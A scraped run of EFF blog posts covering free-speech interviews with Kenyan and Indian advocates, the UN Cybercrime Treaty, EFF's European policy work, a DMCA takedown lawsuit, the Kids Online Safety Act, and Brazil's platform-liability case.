disinformation and hate speech, it\u2019s crucial to have legal frameworks that safeguard society. We live in a society where people, especially politicians, often make inflammatory statements to gain political mileage, and such remarks can lead to serious consequences, including civil unrest.\nKenya\u2019s experience during the 2007-2008 elections is a powerful reminder of how harmful speech can escalate tensions and pit communities against each other. That period taught us the importance of being mindful of what leaders say, as their words have the power to unite or divide.\nI firmly believe that governments must strike a balance between protecting freedom of speech and preventing harm. While everyone has the right to express themselves, that right ends where it begins to infringe on the rights and safety of others. It\u2019s about ensuring that freedom of speech is exercised responsibly to maintain peace and harmony in society.\nGreene: So what do we have to be careful about with giving the government the power to regulate speech? You mentioned hate speech can be hard to define. What's the risk of letting the government define that?\nThe risk is that the government may overstep its boundaries, as often happens. Another concern is the lack of consistent and standardized enforcement. For instance, someone with influence or connections within the government might escape accountability for their actions, while an activist doing the same thing could face arrest. This disparity in treatment highlights the risks of uneven application of the law and potential misuse of power.\nGreene: Earlier you mentioned special concern for access to information. You mentioned children and you mentioned women. Both of those are groups of people where, at least in some places, someone else\u2014not the government, but some other person\u2014might control their access, right? I wonder if you could talk a little bit more about why it's so important to ensure access to information for those particular groups.\u00a0\nI believe home is the foundational space where access to information and freedom of expression are nurtured. Families play a crucial role in cultivating these values, and it\u2019s important for parents to be intentional about fostering an environment where open communication and access to information are encouraged. Parents have a responsibility to create opportunities for discussion within their households and beyond.\nOutside the family, communities provide broader platforms for engagement. In Kenya, for example, public forums known as barazas serve as spaces where community members gather to discuss pressing issues, such as insecurity and public utilities, and to make decisions that impact the neighborhood. Ensuring that your household is represented in these forums is essential to staying informed and being part of decisions that directly affect you.\nIt\u2019s equally important to help people understand the power of self-expression and active participation in decision-making spaces. By showing up and speaking out, individuals can contribute to meaningful change. Additionally, exposure to information and critical discussions is vital in today\u2019s world, where misinformation and disinformation are prevalent. Families can address these challenges by having conversations at the dinner table, asking questions like, \u201cHave you heard about this? What\u2019s your understanding of misinformation? How can you avoid being misled online?\u201d\nBy encouraging open dialogue and critical thinking in everyday interactions, we empower one another to navigate information responsibly and contribute to a more informed and engaged society.\nGreene: Now, a question we ask everyone, who is your free speech hero?\u00a0\nI have two. One is a Human Rights lawyer and a former member of Parliament Gitobu Imanyara.\u00a0 He is one of the few people in Kenya who fought by blood and sweat, literally, for the freedom of speech and that of the press in Kenya. He will always be my hero when we talk about press freedom. We are one of the few countries in Africa that enjoys extreme freedoms around speech and press freedom and it\u2019s thanks to people like him.\u00a0\nThe other is an activist named Boniface Mwangi. He\u2019s a person who never shies away from speaking up. It doesn\u2019t matter who you are or how dangerous it gets, Boni, as he is popularly known, will always be that person who calls out the government when things are going wrong. You\u2019re driving on the wrong side of the traffic just because you\u2019re a powerful person in government. He'll be the person who will not move his car and he\u2019ll tell you to get back in your lane. I like that. I believe when we speak up we make things happen.\nGreene: Anything else you want to add?\u00a0\nI believe it\u2019s time we truly recognize and understand the importance of freedom of expression and speech. Too often, these rights are mentioned casually or taken at face value, without deeper reflection. We need to start interrogating what free speech really means, the tools that enable it, and the ways in which this right can be infringed upon.\nAs someone passionate about community empowerment, I believe the key lies in educating people about these rights\u2014what it looks like when they are fully exercised and what it means when they are violated and especially in today\u2019s digital age. Only by raising awareness can we empower individuals to embrace these freedoms and advocate for better policies that protect and regulate them effectively. This understanding is essential for fostering informed, engaged communities that can demand accountability and meaningful change.<\/p><\/div><\/li> You should be able to message your family and friends without fear that law enforcement is reading everything you send. Privacy is a human right, and that\u2019s why we break down the ways you can protect your ability to have a private conversation.\u00a0\nLearn how governments are able to read certain text messages, and how to ensure your messages are end-to-end encrypted on Digital Rights Bytes, our new site dedicated to helping break down tech issues into byte-sized pieces.\u00a0\u00a0\nWhether you\u2019re just starting to think about your privacy online, or you\u2019re already a regular user of encrypted messaging apps, Digital Rights Bytes is here to help answer some of the common questions that may be bothering you about the devices you use. Watch the short video that explains how to keep your communications private online--and share it with family and friends who may have asked similar questions!\u00a0\nHave you also wondered why it is so expensive to fix your phone, or if you really own the digital media you paid for? We\u2019ve got answers to those and other questions as well! And, if you\u2019ve got additional questions you\u2019d like us to answer in the future, let us know on your social platform of choice\u00a0using the hashtag #DigitalRightsBytes.\u00a0\u00a0<\/p><\/div><\/li> Get a head-start on your New Year's resolution to stay up-to-date on digital rights news by subscribing to EFF's EFFector newsletter!\u00a0\nThis edition of the newsletter covers our top ten digital security resources for those concerned about the incoming administration, a new bill that could put an end to SLAPP lawsuits, and our recent amicus brief arguing that device searches at the border require a warrant (we've been arguing this for a\u00a0long time).\nYou can read the full newsletter here, and even get future\u00a0editions directly to your inbox when you subscribe! Additionally, we've got an audio edition of EFFector on the Internet Archive, or you can view it by clicking the button below:\nLISTEN ON YouTube\nEFFECTOR 36.15 -\u00a010 Resources for Protecting Your Digital Security\nSince 1990 EFF has published EFFector to help keep readers on the bleeding edge of their digital rights. We know that the intersection of technology, civil liberties, human rights, and the law can be complicated, so EFFector is a great way to stay on top of things. The newsletter is chock full of links to updates, announcements, blog posts, and other stories to help keep readers\u2014and listeners\u2014up to date on the movement to protect online privacy and free expression.\u00a0\nThank you to the supporters around the world who make our work possible! If you're not a member yet,\u00a0join EFF today\u00a0to help us fight for a brighter digital future.<\/p><\/div><\/li> Most UN Member States, including the U.S., are expected to support adoption of the flawed UN Cybercrime Treaty when it\u2019s scheduled to go before the UN General Assembly this week for a vote, despite warnings that it poses dangerous risks to human rights. \nEFF and its civil society partners\u2013along with cybersecurity and internet companies, press organizations, the International Chamber of Congress, the United Nations High Commissioner for Human Rights, and others\u2013for years have raised red flags that the treaty authorizes open-ended evidence gathering powers for crimes with little nexus to core cybercrimes, and has minimal safeguards and limitations.\n\u00a0The final draft, unanimously approved in August by over 100 countries that had participated in negotiations, will permit intrusive surveillance practices in the name of engendering cross-border cooperation. \nThe treaty that will go before the UN General Assembly contains many troubling provisions and omissions that don\u2019t comport with international human rights standards and leave the implementation of human rights safeguards to the discretion of Member States. Many of these Member States have poor track records on human rights and national laws that don\u2019t protect privacy while criminalizing free speech and\u00a0 gender expression. \nThanks to the work of a coalition of civil society groups that included EFF, the U.S. now seems to recognize this potential danger. In a statement by the U.S. Deputy Representative to the Economic and Social Council, the U.S. said it \u201cshares the legitimate concerns\u201d of industry and civil society, which warned that some states could leverage their human rights-challenged national legal frameworks to enable transnational repression. \nWe expressed grave concerns that the treaty facilitates requests for user data that will enable cross-border spying and the targeting and harassment of those, for example, who expose and work against government corruption and abuse. Our full analysis of the treaty can be found here.\nNonetheless, the U.S. said it will support the convention when it comes up for this vote, noting among other things that its terms don\u2019t permit parties from using it to violate or suppress human rights. \nWhile that\u2019s true as far as it goes, and is important to include in principle, some Member States\u2019 laws empowered by the treaty already fail to meet human rights standards. And the treaty fails to adopt specific safeguards to truly protect human rights.\nThe safeguards contained in the convention, such as the need for judicial review in the chapter on procedural measures in criminal investigations, are undermined by being potentially discretionary and contingent on state\u2019s domestic laws. In many countries, these domestic laws don\u2019t require judicial authorization based on reasonable suspicion for surveillance and or real-time collection of traffic.\nFor example, our partner Access Now points out that in Algeria, Lebanon, Palestine, Tunisia, and Egypt, cybercrime laws require telecommunications service providers to preemptively and systematically collect large amounts of user data without judicial authorization. \nMeanwhile, Jordan\u2019s cybercrime law has been used against LGBTQ+ people, journalists, human rights defenders, and those criticizing the government.\nThe U.S. says it is committed to combating human rights abuses by governments that misuse national cybercrime statues and tools to target journalists and activists. Implementing the treaty, it says, must be paired with robust domestic safeguards and oversight. \nIt\u2019s hard to imagine that governments will voluntarily revise cybercrime laws as they ratify and implement the treaty; what\u2019s more realistic is that the treaty normalizes such frameworks.\nAdvocating for improvements during the two years-long negotiations was a tough slog. And while the final version is highly problematic, civil society achieved some wins. An early negotiating document named 34 purported cybercrime offenses to be included, many of which would criminalize forms of speech. Civil society warned of the dangers of including speech-related offenses; the list was dropped in later drafts. \nCivil society advocacy also helped secure specific language in the general provision article on human rights specifying that protection of fundamental rights includes freedom of expression, opinion, religion, conscience, and peaceful assembly. Left off the list, though, was gender expression. \nThe U.S., meanwhile, has called on all states \u201cto take necessary steps within their domestic legal systems to ensure the Convention will not be applied in a manner inconsistent with human rights obligations, including those relating to speech, political dissent, and sexual identity.\u201d \nFurthermore, the U.S. government pledges to demand accountability \u2013 without saying how it will do so \u2013 if states seek to misuse the treaty to suppress human rights. \u201cWe will demand accountability for States who try to abuse this Convention to target private companies\u2019 employees, good-faith cybersecurity researchers, journalists, dissidents, and others.\u201d Yet the treaty contains no oversight provisions.\nThe U.S. said it is unlikely to sign or ratify the treaty \u201cunless and until we see implementation of meaningful human rights and other legal protections by the convention\u2019s signatories.\u201d\nWe\u2019ll hold the government to its word on this and on its vows to seek accountability. But ultimately,\u00a0the\u00a0destiny of the U.S declarations and the treaty\u2019s impact in the U.S are more than uncertain under a second Trump administration, as ratification would require both the Senate\u2019s consent and the President's formal ratification. \nTrump\u00a0withdrew from climate, trade, and arms agreements in his first term, so signing the UN Cybercrime Treaty may not be in the cards\u00a0\u2013 a positive outcome, though probably not motivated by concerns for human rights.\nMeanwhile, we urge states to vote against adoption this week and not ratify the treaty at home. The document puts global human rights at risk. In a rush to to win consensus, negotiators gave Member States lots of leeway to\u00a0avoid\u00a0human rights safeguards in their \u201ccriminal\u201d investigations, and now millions of people around the world might pay a high price.\n\u00a0<\/p><\/div><\/li> This post is part one in a series of posts about EFF\u2019s work in Europe.\nEFF\u2019s mission is to ensure that technology supports freedom, justice, and innovation for all people of the world. While our work has taken us to far corners of the globe, in recent years we have worked to expand our efforts in Europe, building up a policy team with key expertise in the region, and bringing our experience in advocacy and technology to the European fight for digital rights.\nIn this blog post series, we will introduce you to the various players involved in that fight, share how we work in Europe, and how what happens in Europe can affect digital rights across the globe.\nWhy EFF Works in Europe\nEuropean lawmakers have been highly active in proposing laws to regulate online services and emerging technologies. And these laws have the potential to impact the whole world. As such, we have long recognized the importance of engaging with organizations and lawmakers across Europe. In 2007, EFF became a member of the European Digital Rights Initiative (EDRi), a collective of NGOs, experts, advocates and academics that have for two decades worked to advance digital rights throughout Europe. From the early days of the movement, we fought back against legislation threatening user privacy in Germany, free expression in the UK, and the right to innovation across the continent.\nOver the years, we have continued collaborations with EDRi as well as other coalitions including IFEX, the international freedom of expression network, Reclaim Your Face, and Protect Not Surveil. In our EU policy work, we have advocated for fundamental principles like transparency, openness, and information self-determination. We emphasized that legislative acts should never come at the expense of protections that have served the internet well: Preserve what works. Fix what is broken. And EFF has made a real difference: We have ensured that recent internet regulation bills don\u2019t turn social networks into censorship tools and safeguarded users\u2019 right to private conversations. We also helped guide new fairness rules in digital markets to focus on what is really important: breaking the chokehold of major platforms over the internet.\nRecognizing the internet\u2019s global reach, we have also stressed that lawmakers must consider the global impact of regulation and enforcement, particularly effects on vulnerable groups and underserved communities. As part of this work, we facilitate a global alliance of civil society organizations representing diverse communities across the world to ensure that non-European voices are heard in Brussels\u2019 policy debates. \nOur Teams\nToday, we have a robust policy team that works to influence policymakers in Europe. Led by International Policy Director Christoph Schmon and supported by Assistant Director of EU Policy Svea Windwehr, both of whom are based in Europe, the team brings a set of unique expertise in European digital policy making and fundamental rights online. They engage with lawmakers, provide policy expertise and coordinate EFF\u2019s work in Europe. \nBut legislative work is only one piece of the puzzle, and as a collaborative organization, EFF pulls expertise from various teams to shape policy, build capacity, and campaign for a better digital future. Our teams engage with the press and the public through comprehensive analysis of digital rights issues, educational guides, activist workshops, press briefings, and more. They are active in broad coalitions across the EU and the UK, as well as in East and Southeastern Europe. \nOur work does not only span EU digital policy issues. We have been active in the UK advocating for user rights in the context of the Online Safety Act, and also work on issues facing users in the Balkans or accession countries. For instance, we recently collaborated with Digital Security Lab Ukraine on a workshop on content moderation held in Warsaw, and participated in the Bosnia and Herzegovina Internet Governance Forum. We are also an active member of the High-Level Group of Experts for Resilience Building in Eastern Europe, tasked to advise on online regulation in Georgia, Moldova and Ukraine.\nEFF on Stage\nIn addition to all of the behind-the-scenes work that we do, EFF regularly showcases our work on European stages to share our mission and message. You can find us at conferences like re:publica, CPDP, Chaos Communication Congress, or Freedom not Fear, and at local events like regional Internet Governance Forums. For instance, last year Director for International Freedom of Expression Jillian C. York gave a talk with Svea Windwehr at Berlin\u2019s re:publica about transparency reporting. More recently, Senior Speech and Privacy Activist Paige Collings facilitated a session on queer justice in the digital age at a workshop held in Bosnia and Herzegovina.\nThere is so much more work to be done. In the next posts in this series, you will learn more about what EFF will be doing in Europe in 2025 and beyond, as well as some of our lessons and successes from past struggles.<\/p><\/div><\/li> Interviewer: David Greene\nThis interview has been edited for length and clarity.*\nPrasanth Sugathan is Legal Director at Software Freedom Law Center, India. (SFLC.in). Prasanth is a lawyer with years of practice in the fields of technology law, intellectual property law, administrative law and constitutional law. He is an engineer turned lawyer and has worked closely with the Free Software community in India. He has appeared in many landmark cases before various Tribunals, High Courts and the Supreme Court of India. He has also deposed before Parliamentary Committees on issues related to the Information Technology Act and Net Neutrality.\nDavid Greene: Why don\u2019t you go ahead and introduce yourself.\u00a0\nSugathan: I am Prasanth Sugathan, I am the Legal Director at the Software Freedom Law Center, India. We are a nonprofit organization based out of New Delhi, started in the year 2010. So we\u2019ve been working at this for 14 years now, working mostly in the area of protecting rights of citizens in the digital space in India. We do strategic litigation, policy work, trainings, and capacity building. Those are the areas that we work in.\u00a0\nGreene: What was your career path? How did you end up at SFLC?\u00a0\nThat\u2019s an interesting story. I am an engineer by training. Then I was interested in free software. I had a startup at one point and I did a law degree along with it. I got interested in free software and got into it full time. Because of this involvement with the free software community, the first time I think I got involved in something related to policy was when there was discussion around software patents. When the patent office came out with a patent manual and there was this discussion about how it could affect the free software community and startups. So that was one discussion I followed, I wrote about it, and one thing led to another and I was called to speak at a seminar in New Delhi. That\u2019s where I met Eben and Mishi from the Software Freedom Law Center. That was before SFLC India was started, but then once Mishi started the organization I joined as a Counsel. It\u2019s been a long relationship.\u00a0\nGreene: Just in a personal sense, what does freedom of expression mean to you?\u00a0\nApart from being a fundamental right, as evident in all the human rights agreements we have, and in the Indian Constitution,\u00a0 freedom of expression is the most basic aspect for a democratic nation. I mean without free speech you can not have a proper exchange of ideas, which is most important for a democracy. For any citizen to speak what they feel, to communicate their ideas, I think that is most important. As of now the internet is a medium which allows you to do that. So there definitely should be minimum restrictions from the government and other agencies in relation to the free exchange of ideas on this medium.\u00a0\nGreene: Have you had any personal experiences with censorship that have sort of informed or influenced how you feel about free expression?\u00a0\nWhen SFLC.IN was started in 2010 our major idea was to support the free software community. But then how we got involved in the debates on free speech and privacy on the internet was when in 2011 there were the IT Rules were introduced by the government as a draft for discussion and finally notified. This was on\u00a0 regulation of intermediaries, these online platforms. This was secondary legislation based on the Information Technology Act (IT Act) in India, which is the parent law. So when these discussions happened we got involved in it and then one thing led to another. For example, there was a provision in the IT Act called Section 66-A which criminalized the sending of offensive messages through a computer or other communication devices. It was, ostensibly, introduced to protect women. And the irony was that two women were arrested under this law. That was the first arrest that happened, and it was a case of two women being arrested for the comments that they made about a leader who expired.\u00a0\nThis got us working on trying to talk to parliamentarians, trying to talk to other people about how we could maybe change this law. So there were various instances of content being taken down and people being arrested, and it was always done under Section 66-A of the IT Act. We challenged the IT Rules before the Supreme Court. In a judgment in a 2015 case called Shreya Singhal v. Union of India the Supreme Court read down the rules relating to intermediary liability. As for the rules, the platforms could be asked to take down the content. They didn\u2019t have much of an option. If they don\u2019t do that, they lose their safe harbour protection. The Court said it can only be actual knowledge and what actual knowledge means is if someone gets a court order asking them to take down the content. Or let\u2019s say there\u2019s direction from the government. These are the only two cases when content could be taken down.\nGreene: You\u2019ve lived in India your whole life. Has there ever been a point in your life when you felt your freedom of expression was restricted?\u00a0\nCurrently we are going through such a phase, where you\u2019re careful about what you\u2019re speaking about. There is a lot of concern about what is happening in India currently. This is something we can see mostly impacting people who are associated with civil society. When they are voicing their opinions there is now a kind of fear about how the government sees it, whether they will take any action against you for what you say, and how this could affect your organization. Because when you\u2019re affiliated with an organization it\u2019s not just about yourself. You also need to be careful about how anything that you say could affect the organization and your colleagues. We\u2019ve had many instances of nonprofit organizations and journalists being targeted. So there is a kind of chilling effect when you really don\u2019t want to say something you would otherwise say strongly. There is always a toning down of what you want to say.\u00a0\nGreene: Are there any situations where you think it\u2019s appropriate for governments to regulate online speech?\u00a0\nYou don\u2019t have an absolute right to free speech under India\u2019s Constitution. There can be restrictions as stated under Article 19(2) of the Constitution. There can be reasonable restrictions by the government, for instance, for something that could lead to violence or something which could lead to a riot between communities. So mostly if you look at hate speech on the net which could lead to a violent situation or riots between communities, that could be a case where maybe the government could intervene. And I would even say those are cases where platforms should intervene. We have seen a lot of hate speech on the net during India\u2019s current elections as there have been different phases of elections going on for close to two months. We have seen that happening with not just political leaders but with many supporters of political parties publishing content on various platforms which aren\u2019t really in the nature of hate speech but which could potentially create situations where you have at least two communities fighting each other. It\u2019s definitely not a desirable situation. Those are the cases where maybe platforms themselves could regulate or maybe the government needs to regulate. In this case, for example, when it is related to elections, the Election Commission also has its role, but in many cases we don\u2019t see that happening.\u00a0\nGreene: Okay, let\u2019s go back to hate speech for a minute because that\u2019s always been a very difficult problem. Is that a difficult problem in India? Is hate speech well-defined? Do you think the current rules serve society well or are there problems with it?\u00a0\nI wouldn\u2019t say it\u2019s well-defined, but even in the current law there are provisions that address it. So anything which could lead to violence or which could lead to animosity between two communities will fall in the realm of hate speech. It\u2019s not defined as such, but then that is where your free speech rights could be restricted. That definitely could fall under the definition of hate speech.\u00a0\nGreene: And do you think that definition works well?\u00a0\nI mean the definition is not the problem. It\u2019s essentially a question of how it is implemented. It\u2019s a question of how the government or its agency implements it. It\u2019s a question of how platforms are taking care of it. These are two issues where there\u2019s more that needs to be done.\u00a0\nGreene: You also talked about misinformation in terms of elections. How do we reconcile freedom of expression concerns with concerns for preventing misinformation?\u00a0\nI would definitely say it\u2019s a gray area. I mean how do you really balance this? But I don\u2019t think it\u2019s a problem which cannot be addressed. Definitely there\u2019s a lot for civil society to do, a lot for the private sector to do. Especially, for example, when hate speech is reported to the platforms. It should be dealt with quickly, but that is where we\u2019re seeing the worst difference in how platforms act on such reporting in the Global North versus what happens in the Global South. Platforms need to up their act when it comes to handling such situations and handling such content.\u00a0\nGreene: Okay, let\u2019s talk about the platforms then. How do you feel about censorship or restrictions on freedom of expression by the platforms?\u00a0\nThings have changed a lot as to how these platforms work. Now the platforms decide what kind of content gets to your feed and how the algorithms work to promote content which is more viral. In many cases we have seen how misinformation and hate speech goes viral. And content that is debunking the misinformation which is kind of providing the real facts, that doesn\u2019t go as far. The content that debunks misinformation doesn\u2019t go viral or come up in your feed that fast. So that definitely is a problem, the way platforms are dealing with it. In many cases it might be economically beneficial for them to make sure that content which is viral and which puts forth misinformation reaches more eyes.\u00a0\nGreene: Do you think that the platforms that are most commonly used in India\u2014and I know there\u2019s no TikTok in India\u2014 serve free speech interests or not?\u00a0\nWhen the Information Technology Rules were introduced and when the discussions happened, I would say civil society supported the platforms, essentially saying these platforms ensured we can enjoy our free speech rights, people can enjoy their free speech rights and express themselves freely. How the situation changed over a period of time is interesting. Definitely these platforms are still important for us to express these rights. But when it comes to, let\u2019s say, content being regulated, some platforms do push back when the government asks them to take down the content, but we have not seen that much. So whether they\u2019re really the messiahs for free speech, I doubt. Over the years, we have seen that it is most often the case that when the government tells them to do something, it is in their interest to do what the government says. There has not been much pushback except for maybe Twitter challenging it in the court.\u00a0 There have not been many instances where these platforms supported users.\u00a0\nGreene: So we\u2019ve talked about hate speech and misinformation, are there other types of content or categories of online speech that are either problematic in India now or at least that regulators are looking at that you think the government might try to do something with?\u00a0\nOne major concern which the government is trying to regulate is about deepfakes, with even the Prime Minister speaking about it. So suddenly that is something of a priority for the government to regulate. So that\u2019s definitely a problem, especially when it comes to public figures and particularly women who are in politics who often have their images manipulated. In India we see that at election time. Even politicians who have been in the field for a long time, their images have been misused and morphed images have been circulated. So that\u2019s definitely something that the platforms need to act on. For example, you cannot have the luxury of, let\u2019s say, taking 48 hours to decide what to do when something like that is posted. This is something which platforms have to deal with as early as possible. We do understand there\u2019s a lot of content and a lot of reporting happening, but in some cases, at least, there should be some prioritization of these reporting related to non-consensual sexual imagery. Maybe then the priority should go up.\u00a0\nGreene: As an engineer, how do you feel about deepfake tech? Should the regulatory concerns be qualitatively different than for other kinds of false information?\u00a0\nWhen it comes to deepfakes, I would say the problem is that it has become more mainstream. It has become very easy for a person to use these tools that have become more accessible. Earlier you needed to have specialized knowledge, especially when it came to something like editing videos. Now it\u2019s become much easier. These tools are made easily available. The major difference now is how easy it is to access these applications. There can not be a case of fully regulating or fully controlling a technology. It\u2019s not essentially a problem with the technology, because there would be a lot of ethical use cases. Just because something is used for a harmful purpose doesn\u2019t mean that you completely block the technology. There is definitely a case for regulating AI and regulating deepfakes, but that doesn\u2019t mean you put a complete stop to it.\u00a0\nGreene: How do you feel about TikTok being banned in India?\u00a0\nI think that\u2019s less a question of technology or regulation and more of a geopolitical issue. I don\u2019t think it has anything to do with the technology or even the transfer of data for that matter. I think it was just a geopolitical issue related to India\/ China relations. The relations have kind of soured with the border disputes and other things, I think that was the trigger for the TikTok ban.\u00a0\nGreene: What is your most significant legal victory from a human rights perspective and why?\u00a0\nThe victory that we had in the fight against the 2011 Rules and the portions related to intermediary liability, which was shot down by the Supreme Court. That was important because when it came to platforms and when it came to people expressing their critical views online, all of this could have been taken down very easily. So that was definitely a case of free speech rights being affected without much recourse. So that was a major victory.\u00a0\nGreene: Okay, now we ask everyone this question. Who is your free speech hero and why?\nI can\u2019t think of one person, but I think of, for example, when the country went through a bleak period in the 1970s and the government declared a national state of emergency. During that time we had journalists and politicians who fought for free speech rights with respect to the news media. At that time even writing something in the publications was difficult. We had many cases of journalists who were fighting this, people who had gone to jail for writing something, who had gone to jail for opposing the government or publicly criticizing the government. So I don\u2019t think of just one person, but we have seen journalists and political leaders fighting back during that state of emergency. I would say those are the heroes who could fight the government, who could fight law enforcement. Then there was the case of Justice H.R. Khanna, a judge who stood up for citizen\u2019s rights and gave his dissenting opinion against the majority view, which cost him the position of Chief Justice. Maybe I would say he\u2019s a hero, a person who was clear about constitutional values and principles.<\/p><\/div><\/li> No one gets to abuse copyright to shut down debate. Because of that, we at EFF represent Channel 781, a group of citizen journalists whose YouTube channel was temporarily shut down following copyright infringement claims made by Waltham Community Access Corporation (WCAC). As part of that case, the federal court in Massachusetts heard oral arguments in Channel 781 News v. Waltham Community Access Corporation, a pivotal case for copyright law and digital journalism.\u00a0 \nWCAC, Waltham\u2019s public access channel, records city council meetings on video. Channel 781, a group of independent journalists, curates clips of those meetings for its YouTube channel, along with original programming, to spark debate on issues like housing policy and real estate development. WCAC sent a series of DMCA takedown notices that accused Channel 781 of copyright infringement, resulting in YouTube deactivating Channel 781\u2019s channel just days before a critical municipal election.\nRepresented by EFF and the law firm Brown Rudnick LLP, Channel 781 sued WCAC for misrepresentations in its DMCA takedown notices. We argued that using clips of government meetings from the government access station to engage in public debate is an obvious fair use under copyright. Also, by excerpting factual recordings and using captions to improve accessibility, the group aims to educate the public, a purpose distinct from WCAC\u2019s unannotated broadcasts of hours-long meetings. The lawsuit alleges that WCAC\u2019s takedown requests knowingly misrepresented the legality of Channel 781's use, violating Section 512(f) of the DMCA.\nFighting a Motion to Dismiss\nIn court this week, EFF pushed back against WCAC\u2019s motion to dismiss the case. We argued to District Judge Patti Saris that Channel 781\u2019s use of video clips of city government meetings was an obvious fair use, and that by failing to consider fair use before sending takedown notices to YouTube, WCAC violated the law and should be liable for damages.\nIf Judge Saris denies WCAC\u2019s motion, we will move on to proving our case. We\u2019re confident that the outcome will promote accountability for copyright holders who misuse the powerful notice-and-takedown mechanism that the DMCA provides, and also protect citizen journalists in their use of digital tools.\nEFF will continue to provide updates as the case develops. Stay tuned for the latest news on this critical fight for free expression and the protection of digital rights.<\/p><\/div><\/li> Late last week, the Senate released yet another version of the Kids Online Safety Act, written, reportedly, with the assistance of X CEO Linda Yaccarino in a flawed attempt to address the critical free speech issues inherent in the bill. This last minute draft remains, at its core, an unconstitutional censorship bill that threatens the online speech and privacy rights of all internet users.\u00a0\nTELL CONGRESS:\u00a0VOTE NO ON KOSA\nno kosa\u00a0in\u00a0last minute funding bills\nUpdate Fails to Protect Users from Censorship or Platforms from Liability\nThe most important update, according to its authors, supposedly minimizes the impact of the bill on free speech. As we\u2019ve said before, KOSA\u2019s \u201cduty of care\u201d section is its biggest problem, as it would force a broad swath of online services to make policy changes based on the content of online speech. Though the bill\u2019s authors inaccurately claim KOSA only regulates designs of platforms, not speech, the list of harms it enumerates\u2014eating disorders, substance use disorders, and suicidal behaviors, for example\u2014are not caused by the design of a platform.\u00a0\nThe authors have failed to grasp the difference between immunizing individual expression and protecting\u00a0a\u00a0platform from the liability that KOSA would place on it. \nKOSA is likely to actually increase the risks to children, because it will prevent them from accessing online resources about topics like addiction, eating disorders, and bullying. It will result in services imposing age verification requirements and content restrictions, and it will stifle minors from finding or accessing their own supportive communities online. For these reasons, we\u2019ve been critical of KOSA since it was introduced in 2022.\u00a0\nThis updated bill adds just one sentence to the \u201cduty of care\u201d requirement:\u201cNothing in this section shall be construed to allow a government entity to enforce subsection a [the duty of care] based upon the viewpoint of users expressed by or through any speech, expression, or information protected by the First Amendment to the Constitution of the United States.\u201d But the viewpoint of users was never impacted by KOSA\u2019s duty of care in the first place. The duty of care is a duty imposed on platforms, not users. Platforms must mitigate the harms listed in the bill, not users, and the platform\u2019s ability to share users\u2019 views is what\u2019s at risk\u2014not the ability of users to express those views. Adding that the bill doesn\u2019t impose liability based on user expression doesn\u2019t change how the bill would be interpreted or enforced. The FTC could still hold a platform liable for the speech it contains.\nLet\u2019s say, for example, that a covered platform like reddit hosts a forum created and maintained by users for discussion of overcoming eating disorders. Even though the speech contained in that forum is entirely legal, often helpful, and possibly even life-saving, the FTC could still hold reddit liable for violating the duty of care by allowing young people to view it. The same could be true of a Facebook group about LGBTQ issues, or for a post about drug use that X showed a user through its algorithm. If a platform\u2019s defense were that this information is protected expression, the FTC could simply say that they aren\u2019t enforcing it based on the expression of any individual viewpoint, but based on the fact that the platform allowed a design feature\u2014a subreddit, Facebook group, or algorithm\u2014to distribute that expression to minors. It\u2019s a superfluous carveout for user speech and expression that KOSA never penalized in the first place, but which the platform would still be penalized for distributing.\u00a0\nIt\u2019s particularly disappointing that those in charge of X\u2014likely a covered platform under the law\u2014had any role in writing this language, as the authors have failed to grasp the world of difference between immunizing individual expression, and protecting their own platform from the liability that KOSA would place on it.\u00a0\u00a0\nCompulsive Usage Doesn\u2019t Narrow KOSA\u2019s Scope\u00a0\nAnother of KOSA\u2019s issues has been its vague list of harms, which have remained broad enough that platforms have no clear guidance on what is likely to cross the line. This update requires that the harms of \u201cdepressive disorders and anxiety disorders\u201d have \u201cobjectively verifiable and clinically diagnosable symptoms that are related to compulsive usage.\u201d The latest text\u2019s definition of compulsive usage, however, is equally vague: \u201ca persistent and repetitive use of a covered platform that significantly impacts one or more major life activities, including socializing, sleeping, eating, learning, reading, concentrating, communicating, or working.\u201d This doesn\u2019t narrow the scope of the bill.\u00a0\n\u00a0The bill doesn\u2019t even require that the impact be a negative one.\u00a0\nIt should be noted that there is no clinical definition of \u201ccompulsive usage\u201d of online services. As in past versions of KOSA, this updated definition cobbles together a definition that sounds just medical, or just legal, enough that it appears legitimate\u2014when in fact the definition is devoid of specific legal meaning, and dangerously vague to boot.\u00a0\nHow could the persistent use of social media not significantly impact the way someone socializes or communicates? The bill doesn\u2019t even require that the impact be a negative one. Comments on an Instagram photo from a potential partner may make it hard to sleep for several nights in a row; a lengthy new YouTube video may impact someone\u2019s workday. Opening a Snapchat account might significantly impact how a teenager keeps in touch with her friends, but that doesn\u2019t mean her preference for that over text messages is \u201ccompulsive\u201d and therefore necessarily harmful.\u00a0\nNonetheless, an FTC weaponizing KOSA could still hold platforms liable for showing content to minors that they believe results in depression or anxiety, so long as they can claim the anxiety or depression disrupted someone\u2019s sleep, or even just changed how someone socializes or communicates. These so-called \u201charms\u201d could still encompass a huge swathe of entirely legal (and helpful) content about everything from abortion access and gender-affirming care to drug use, school shootings, and tackle football.\u00a0\nDangerous Censorship Bills Do Not Belong in Must-Pass Legislation\nThe latest KOSA draft comes as incoming nominee for FTC Chair, Andrew Ferguson\u2014who would be empowered to enforce the law, if passed\u2014has reportedly vowed to protect free speech by \u201cfighting back against the trans agenda,\u201d among other things. As we\u2019ve said for years (and about every version of the bill), KOSA would give the FTC under this or any future administration wide berth to decide what sort of content platforms must prevent young people from seeing. Just passing KOSA would likely result in platforms taking down protected speech and implementing age verification requirements, even if it's never enforced; the FTC could simply express the types of content they believe harms children, and use the mere threat of enforcement to force platforms to comply.\u00a0\u00a0\nNo representative should consider shoehorning this controversial and unconstitutional bill into a continuing resolution. A law that forces platforms to censor truthful online content should not be in a last minute funding bill.\nTELL CONGRESS: VOTE NO ON KOSA\nno kosa\u00a0in\u00a0last minute funding bills<\/p><\/div><\/li> The Brazilian Supreme Court is on the verge of deciding whether digital platforms can be held liable for third-party content even without a judicial order requiring removal. A panel of eleven justices is examining two cases jointly, and one of them directly challenges whether Brazil\u2019s internet intermediary liability regime for user-generated content aligns with the country\u2019s Federal Constitution or fails to meet constitutional standards. The outcome of these cases can seriously undermine important free expression and privacy safeguards if they lead to general content monitoring obligations or broadly expand notice-and-takedown mandates.\u00a0 \nThe court\u2019s examination revolves around Article 19 of Brazil\u2019s Civil Rights Framework for the Internet (\u201cMarco Civil da Internet\u201d, Law n. 12.965\/2014). The provision establishes that an internet application provider can only be held liable for third-party content if it fails to comply with a judicial order to remove the content. A notice-and-takedown exception to the provision applies in cases of copyright infringement, unauthorized disclosure of private images containing nudity or sexual activity, and content involving child sexual abuse. The first two exceptions are in Marco Civil, while 